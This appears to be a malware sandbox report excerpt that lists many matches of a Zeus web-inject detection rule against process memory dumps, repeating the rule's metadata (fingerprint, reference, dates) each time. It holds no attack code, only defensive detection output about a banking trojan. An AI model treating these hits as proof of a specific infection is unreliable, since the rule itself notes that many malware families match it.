    Source: 00000027.00000002.1908352092.00000000028F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000014.00000002.1811513588.0000000002560000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1936749953.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000006.00000002.1844458477.0000000000820000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1802342422.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000009.00000002.1857835167.00000000027C0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1892734452.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1937280291.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1832269912.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1900019972.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000009.00000002.1859321562.0000000002BD0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1893633503.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000016.00000002.1814429100.0000000001220000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1403293254.0000000000883000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1919368621.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1781590454.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1931753545.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000002.2654834253.0000000002A56000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1407157898.0000000002AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1892977069.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1771500442.0000000004190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000002.2655337628.0000000002C13000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1893366330.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1900579687.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0000000D.00000002.1864825235.0000000000D70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000014.00000002.1809736468.0000000002170000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000002.2654834253.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1788047378.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1896507148.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1937495676.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1892490476.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1808599127.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1910755217.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000018.00000002.1872752662.0000000000A30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1888344420.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1917963207.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1751304205.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1931351798.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1931013445.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1402494872.0000000000883000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
